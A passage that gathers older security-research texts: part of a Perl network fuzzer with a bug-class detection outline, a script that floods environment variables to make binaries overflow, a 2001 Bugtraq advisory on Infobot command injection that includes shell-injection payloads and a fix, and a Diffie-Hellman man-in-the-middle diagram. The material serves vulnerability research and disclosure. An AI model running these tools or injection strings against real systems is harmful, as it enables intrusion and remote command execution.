      $words_temp[$k] = $vulnchkstr. $words[$k];
      @{$sessions[$i]} = @send;
      $sessions[$i++][$j] = join $seperator, @words_temp;
    }
  }

  return @sessions;
}

# 5bg functions
sub try_5bg
{
  my $temp_tout = $recvtout;
  my($sessions, $recvs) = &get_5bg_sessions;

  &send_std_session(1, $sessions, $recvs);
}

sub get_5bg_sessions
{
  my(@sessions, @recvs, $i, $j, $k);
  $i = 0;

  foreach $j (0..$#send)
  {
    if(!$send[$j]) { next }

    $k = 0;
    for(0..$#send)
    {
      if($_ == $j)
      {
        for(0..$_5bg_tries)
        {
          $sessions[$i][$k] = $send[$j];
          $recvs[$i][$k++] = $recv[$j];
        }
      }
      else
      {
        $sessions[$i][$k] = $send[$_];
        $recvs[$i][$k++] = $recv[$_];
      }
    }
    $i++;
  }

  return(\@sessions, \@recvs);
}

# 5bh functions
sub try_5bh
{
  my @sessions = &get_5bh_sessions;
  &send_std_session(2, \@sessions);
}

sub get_5bh_sessions
{
  my(@sessions, $i, $j, $k);
  $i = 0;

  foreach $j (0..$#send)
  {
    my @words = split/$sepregex+/, $send[$j];
    foreach $k (0..$#words)
    {
      if($words[$k] =~ /^\-?[0-9]+$/ && $words[$k] != 0)
      {
        my @words_temp = @words;
        # then with the inverse of the number or -1 if it's 0.
        $words_temp[$k] *= -1;
        @{$sessions[$i]} = @send;
        $sessions[$i++][$j] = join $seperator, @words_temp;
      }
    }
  }

  return @sessions;
}

# 5bi functions
sub try_5bi
{
  my @sessions = &get_5bi_sessions;
  &send_std_session(2, \@sessions);
}

sub get_5bi_sessions
{
  my(@sessions, $i, $j, $k);
  $i = 0;

  foreach $j (0..$#send)
  {
    my @words = split /$sepregex+/, $send[$j];
    foreach $k (0..$#words)
    {
      my @words_temp = @words;
      $words_temp[$k] = &urlescape($words[$k]);
      @{$sessions[$i]} = @send;
      $sessions[$i++][$j] = join $seperator, @words_temp;
      # lets try adding the vuln checking string to both the front and end
      $words_temp[$k] = &urlescape($words[$k] .$vulnchkstr);
      @{$sessions[$i]} = @send;
      $sessions[$i++][$j] = join $seperator, @words_temp;
      $words_temp[$k] = &urlescape($vulnchkstr. $words[$k]);
      @{$sessions[$i]} = @send;
      $sessions[$i++][$j] = join $seperator, @words_temp;
    }
  }

  return @sessions;
}

# general functionality
sub connectto
{
  my $t = new Net::Telnet(
   Host => $host,
   Port => $port,
   Telnetmode => 0,
   Timeout => $recvtout);
  $t->errmode('return');
  $t->open();
  return $t;
}

# 5b sending functions
# errlevel == 1, check for disconnect
# errlevel == 2, check for different responses
# search == 1, check only the first word in the string
# search == -1, search the full recv string
sub send_std_session
{
  my $errlevel = $_[0];
  my @sessions = @{$_[1]};
  my @recvs    = @{$_[2]};
  my($i, $j, @responses);

  foreach $i (0..$#sessions)
  {
    my $err = 0;
    my $t = &connectto;
    my @temp_recvs = defined($_[2]) ? @{$recvs[$i]} : @recv;


    foreach $j (0..$#temp_recvs)
    {
      if($err == 1) { next }
      # wait for receive before flushing input.
      ($sessions[$i][$j]) and $t->print($sessions[$i][$j]);
      my $line = $t->getline;
      while($t->getline) { }
      $line =~ s/[\r\n]+$//g; $line =~ s/[\r\n]+/\\n/g;

      if($temp_recvs[$j] =~ /^([^$sepregex]+)/)
      {
        my $search = &escaperegex($1);
        $search =~ s/[\r\n]+/\\n/g;

        if(!defined($line) && ($errlevel == 1 || $verbose > 1))
        {
          print "------[ ! connection closed, sent: $sessions[$i][$j], ".
           "expect: $1, recv: $line\n";
          &printsessverbose(\@{$sessions[$i]}, \@{$responses[$i]})
           if(($errlevel == 1 && $verbose > 0) ||
           ($errlevel == 2 && $verbose > 2));
          $err = 1;
        }
        if(defined($line) &&
         ($line !~ /$search/ && ($errlevel == 2 || $verbose > 1)))
        {
          print "------[ ! sent: $sessions[$i][$j], expect: $1, recv: $line\n";
          &printsessverbose(\@{$sessions[$i]}, \@{$responses[$i]})
           if(($errlevel == 2 && $verbose > 0) ||
           ($errlevel == 1 && $verbose > 2));
        }
        $responses[$i][$j] = $line;
      }
    }
    $t->close();
  }
}

# misc functions
sub host2ip
{
  return join(".", unpack("C4", (gethostbyname($_[0]))[4]));
}

sub escaperegex
{
  my $search = $_[0];
  $search =~ s/([^0-9a-zA-Z])/\\$1/g;
  return $search;
}

sub urlescape
{
  my $url = $_[0];
  $url =~ s/(.)/sprintf("%%%x", ord($1))/eg;
  return $url;
}

sub printsessverbose
{
  my @sessions = @{$_[0]};
  my @responses = @{$_[1]};
  my $k;

  foreach $k (0..$#responses)
  {
    ($sessions[$k]) and print "--[ send $k: $sessions[$k]\n";
    ($responses[$k]) and print "--[ recv $k: $responses[$k]\n";
  }
}

# combinations oop functions
sub newcombo
{
  $class = shift;
  $list = [ @_ ];
  bless [$list, [0 .. $#$list]], $class;
}

sub nextcombo
{
  $self = shift;
  $list = $self->[0];
  $tot = $self->[1];
  return unless @$tot;
  @next = @$tot;
  @end = pop @next;
  while (@next && $next[-1] > $end[-1])
  {
    push(@end, pop(@next));
  }
  if (defined($extra = pop(@next)))
  {
    ($place) = grep $extra < $end[$_], 0 .. $#end;
    ($extra, $end[$place]) = ($end[$place], $extra);
    $self->[1] = [@next, $extra, @end];
  }
  else
  {
    $self->[1] = [];
  }
  return @$list[@$tot];
}


5b. Automatic Exploit Discovery -

1. Identify classifications of common software bugs as specifically as possible
2. Name a theoretical example of each bug, ideally in "ASCII over TCP" protocols
3. Describe an algorithm for automating remote detection of those bugs in client-server software. Assume that you have a working copy of server software, captured images of valid transactions and reasonable hardware. Ideal situations will need no knowledge of the protocol grammar beyond word and seperator characters.


The Answers -

a1. Failure to validate input buffer lengths
a2. In POP3 authentication, username input may not be length-validated.
a3. Most buffer overflows can be detected in ASCII protocols by replaying a captured session repeatedly, replacing one word each time with a 4097 character word.
- check for disconnect

b1. Fencepost a.k.a. Off by one counting errors
b2. In POP3 message retrieval, there could be an off-by-one error in the number of retreivable messages.
b3. Off-by-one errors can be detected by replaying a captured session with each numeric client-side word replaced with each previously seen numeric server words.
- check for different response

c1. Null Pointers, Dereferencing, Page Fault
c2. In POP3, deleting or retreiving message 0 without checking, or executing commands out of order might cause null pointers to be used.
c3. Null Pointers can be detected by replaying a captured session and executing the commands in a different order, or by replacing numerical words with 0 or negative numbers.
- check for disconnect

d1. Race Conditions
d2. In POP3 race conditions may occur when mail is received or removed and counters are modified while being read or written to by other connected clients.
d3. Race Conditions can be detected by replaying a captured session in a control process and executing other captured sessions with the commands put in various orders at the same time and looking for unexpected results. (e.g., run your control process without a second test process, then re-run with the test process running concurrently and check for deviations with the results).
- check for deviations

e1. Using uninitialized variables/memory
e2. In POP3 validation of protocol order may not be checked, sending your password before username or executing commands out of order may cause uninitialized variables to be used.
e3. Using uninitialized variables/memory can be detected by replaying a captured session with the client-side commands put in different order.
- check for disconnect

f1. Poorly implemented input matching
f2. In HTTP, failure to check filenames that might attempt a directory traversal ".." or unexpected characters or strings passed to cgi applications.
f3. Poorly implemented input matching can be detected by replaying a captured session with each word replaced with unexpected input characters depending on the protocol. (e.g. "..", file globbing characters -- "*, ?, +, [, ]", regex matching characters -- "+, *, ?, ^, $, (, ), {, }, [, ]", format string vuln characters -- "%s, %d, %p, %n, etc", common exec exploitation characters -- ";, <, >, |, ", '", null and non-ascii characters)
- check for different response

g1. Memory leaks (not freeing dynamically allocated memory)
g2. In POP3, if memory for each message is not freed and numerous messages are read, it could cause denial of service.
g3. Memory leaks can be detected by replaying a captured session and repeating a command numerous times while checking latency and availability.
- check for latency or disconnect

h1. Mixing signed and unsigned number variables
h2. In HTTP, sending an negative number as the byte count (Content-Length) for a POST, assuming the httpd uses a signed variable with the byte count. (which would check out fine if the program checks to see if the content-length is < the bytes read) And in turn if it set the length variable for the POST buffer to the negative number, it could cause the processing function to read more data than is supplied.
h3. Improper mixing of signed and unsigned number variables can be detected by replaying a captured session with all numerical words inverted to their negative equivalent, or positive equivalent if negative.
- check for different response

i1. Failure to resolve escapes before validating
i2. In HTTP, failure to resolve unicode, specialchars, and other http escaped characters before input matching.
i3. Failure to resolve escapes before validating can be detected by replaying a normal session as well as all input matching sessions with all characters escaped.
- check for different response


#!/usr/bin/perl

# testenvs.pl - by CommPort5 [@LucidX.com]
# attempts to find and overflow environment variables
# in a binary program

$SIG{INT} = \&data;
$SIG{'TSTP'} = \&data;

die "usage: $0 < /path/to/binary >\n" unless @ARGV == 1;

@ignore = split(/\s+/,
"TERM USER TTOU TTIN TSTP STOP CONT CHLD STKFLT ALRM PIPE USR2 SEGV USR1 KILL FPE BUS IOT ABRT TRAP ILL QUIT INT HUP _DYNAMIC _GLOBAL_OFFSET_TABLE_ --");

print "testenvs.pl :: tests environment variables in binary programs for buffer overflows\n";

open(BINARY, shift) || die "Can't open file: $!\n";
@read = <BINARY>;
close(BINARY);
$i = 0;
$tokens = @read;
while ($read[$i]) {
 @tmpread = split(chr(0), $read[$i]);
 $tokens = @tmpread;
 $j = -1;
 while ($j < $tokens) {
  $j++;
  $k = 0;
  while (isvalid(substr($tmpread[$j], $k, 1)) && length($tmpread[$j]) > 1) {
   if ($k + 1 == length($tmpread[$j])) {
    $m = 0;
    @s = @ignore;
    $l = 0;
    while ($s[$l]) {
     if ($s[$l] eq $tmpread[$j]) {
      $m++;
     }
     $l++;
    }
    @s = split(/,/, $result);
    $l = 0;
    while ($s[$l]) {
     if ($s[$l] eq $tmpread[$j] || $s[$l] eq " $tmpread[$j]") {
      $m++;
     }
     $l++;
    }
    if (!$m && substr($tmpread[$j], 0, 3) ne "SIG" && substr($tmpread[$j], 0, 2) ne "__" &&
    substr($tmpread[$j], length($tmpread[$j]) - 2, 2) ne "__") {
     if (!$result) {
      $result = $tmpread[$j];
     }
     else {
      $result = "$result, $tmpread[$j]";
     }
    }
   }
   $k++;
  }
 }
 $i++;
}

&data;

sub data {
 if ($result) {
  foreach (split(/,\s*/, $result)) {
   $ENV{$_} = "A" x 2500;
  }
  exec("$ARGV[0] " . "A" x 2500);
 }
 else {
  print "no typical ENV variables found.\nattempt arguement overflows manually [and environment, if any].\n";
 }
}

sub isvalid {
 $char = substr(shift, 0, 1);
 if (ord($char) > 64 && ord($char) < 91 || ord($char) > 47 && ord($char) < 58 || ord($char) == 45 || ord($char) == 95) {
  return 1;
 }
 return 0;
}


#!/usr/bin/perl

# getenvs.pl - by CommPort5 [@LucidX.com]
# this is a hacked up and nice version of v9's getenv program
# so credits go to him

$SIG{INT} = \&data;
$SIG{'TSTP'} = \&data;

die "usage: $0 < /path/to/binary >\n" unless @ARGV == 1;

#@ignore = split(/\s+/,
#"TTOU TTIN TSTP STOP CONT CHLD STKFLT ALRM PIPE USR2 SEGV USR1 KILL FPE BUS IOT ABRT TRAP ILL QUIT INT HUP _DYNAMIC
#_GLOBAL_OFFSET_TABLE_ --");

print "getenvs.pl :: finds environment variables in binary programs\n";

&readbinary(@ARGV);
&data;
exit(0);

sub readbinary {
 open(BINARY, shift) || die "Can't open file: $!\n";
 @read = <BINARY>;
 close(BINARY);
 $i = 0;
 $tokens = @read;
 while ($read[$i]) {
  @tmpread = split(chr(0), $read[$i]);
  $tokens = @tmpread;
  $j = -1;
  while ($j < $tokens) {
   $j++;
   $k = 0;
   while (isvalid(substr($tmpread[$j], $k, 1)) && length($tmpread[$j]) > 1) {
    if ($k + 1 == length($tmpread[$j])) {
     $m = 0;
     @s = @ignore;
     $l = 0;
     while ($s[$l]) {
      if ($s[$l] eq $tmpread[$j]) {
       $m++;
      }
      $l++;
     }
     @s = split(/,/, $result);
     $l = 0;
     while ($s[$l]) {
      if ($s[$l] eq $tmpread[$j] || $s[$l] eq " $tmpread[$j]") {
       $m++;
      }
      $l++;
     }
     if (!$m && substr($tmpread[$j], 0, 3) ne "SIG" && substr($tmpread[$j], 0, 2) ne "__" &&
     substr($tmpread[$j], length($tmpread[$j]) - 2, 2) ne "__") {
      if (!$result) {
       $result = $tmpread[$j];
      }
      else {
       $result = "$result, $tmpread[$j]";
      }
     }
    }
    $k++;
   }
  }
  $i++;
 }
}

sub data {
 if ($result) {
  print "possible ENV variables: $result\n";
 }
 else {
  print "no typical ENV variables found.\n";
 }
}

sub isvalid {
 $char = substr(shift, 0, 1);
 if (ord($char) > 64 && ord($char) < 91 || ord($char) > 47 && ord($char) < 58 || ord($char) == 45 || ord($char) == 95) {
  return 1;
 }
 return 0;
}


Date:         Tue, 6 Feb 2001 22:53:27 -0800
From: "samy [CommPort5]" <CommPort5@LUCIDX.COM>
Subject:      Infobot 0.44.5.3/below remotely vulnerable (also in FreeBSD ports
To: BUGTRAQ@SECURITYFOCUS.COM

Advisory: Infobot 0.44.5.3 and below vulnerability [Hack-X]
This version and versions from before were also released into the
FreeBSD ports tree.
Currently there is no patched version even though I emailed the author
over a month ago about this and emailed the development list over a
week, and them saying it would be fixed immidiately although still
isn't.  A patch follows below.

Author: samy [CommPort5@LucidX.com]
Special thanks to zsvx for helping find this problem and testing it on
multiple infobots.

I.   Background

Infobot is an IRC bot written in perl for information retrieval and
storage along with channel management and many other useful tasks.

II.  Problem Description

Infobot has a 'fortran math' section that's used with the 'calc'
command via IRC.  If someone were to message (privately or in a
channel) with 'calc 1+1' (assuming fortran math is enabled in the
config file), the bot would return '2'.  The problem is the way
this function works.  It uses open() to run `bc`, which does the
actual math.
The original code was
open(P, "echo $parm|bc 2>&1 |");
which allowed someone to use |'s to escape the echo and run anything
through open().  Although, whitespaces are eliminated from user-input
with fortran math so this eliminates a lot of possibilities.
They soon fixed this bug with
open(P, "echo '$parm'|bc 2>&1 |");
This only opened up another hole.  A user is now able to escape the
echo by using single-quotes and semicolons, but they are stlil
unable to use whitespaces.  To get around the whitespaces, the user
is able to use a local variable set in the terminal.  $IFS is, by
default on almost all systems, a newline character or whitespace.
Either of these would work, so in code you would be able to replace
a whitespace with $IFS.

III. Impact

Any malicious user would be able to run arbitrary files writable by
the user running infobot.  They would also be able to recieve
information or write, since infobot automatically replies the data
the open() sent.  A user would be able to easily check the operating
system and gain other information like so:
calc ';uname$IFS"-a";'
or in older versions:
calc |uname$IFS"-a"|
They would also be able to install arbitrary files and execute them.

IV.  Workaround

Disable fortran math in the infobot configuration file and restart
the infobot.

V.   Solution

The best solution would be to parse out certain characters from the
user's input.  You can do this by adding a line to src/Math.pl in
the infobot's main directory.  You will see on line 40:
$parm =~ s/\s//g;
After this line, create a new line and insert this:
$parm =~ s/[\|;']//g;
Save the file (src/Math.pl) and restart infobot.

--
samy -- (877) 898-1424 -- CommPort5@LucidX.com
LucidX.com / pdump.org / LA.pm.org


Preventing Man-in-the-Middle Attacks with
Diffie-Hellman Key Exchange and Authentication

Samy Kamkar - samy@samy.pl - August 4, 2009
h = hash(plaintext, salt)              e = encrypt(plaintext, key)                  d = decrypt(ciphertext, key)


MAN IN THE MIDDLE ATTACK ON STANDARD AUTHENTICATION METHOD

Alice                                                              Mallory                                                          Bob
password = 54321                                                                                     password = 54321
key = zzz                                          alice key = zzz (DH MITMA)                key = yyy
                                                        bob key = yyy (DH MITMA)
e(password,key) = passhash                                                                      e(password,key) = passhash
e(54321,zzz) = "deadbeef"                                                                         e(54321,yyy) = "badcoded"
SEND: "deadbeef"                              d(deadbeef,zzz) = 54321
                                                        e(54321,yyy) = "badcoded"
                                                        SEND->Bob: "badcoded"
                                                                                                                                             RECV: "badcoded" matches

MITMA successful :(

NEW AUTHENTICATION METHOD

Alice                                                                                                       Bob
password = 54321                                                             password = 54321
key = zzz                                                                          key = zzz
h(54321,key) = "blahwoot"                                                h(54321,key) = "blahwoot"
SEND: "blahwoot
                                                                                                               RECV: "blahwoot" matches
h(ok,password) = GOOD!                                                   h(ok,password) = GOOD!
h("ok",54321) = "awesome"                                               h("ok",54321) = "awesome"
SEND: "awesome"
RECV: "awesome" matches
pubkey now saved for future use in known_hosts

                                                          DH + authentication verified

MAN IN THE MIDDLE ATTACK ON NEW METHOD
Alice                                                          Mallory                                            Bob
password = 54321                                                                       password = 54321
key = zzz                                      alice key = zzz (DH MITMA)      key = yyy
                                                    bob key = yyy (DH MITMA)
h(password,key) = passhash                                                        h(password,key) = passhash
h(54321,zzz) = "blahwoot"                                                           h(54321,yyy) = "wtfmate"
SEND: "blahwoot"                          can't reverse hash to get pass!
                                                    can't send h(ok,password)        RECV: "blahwoot" != "wtfmate"
                                                    doesn't know password            SEND: BAD!
RECV: BAD!
pubkey NOT saved in known_hosts

                                                           both sides fail authentication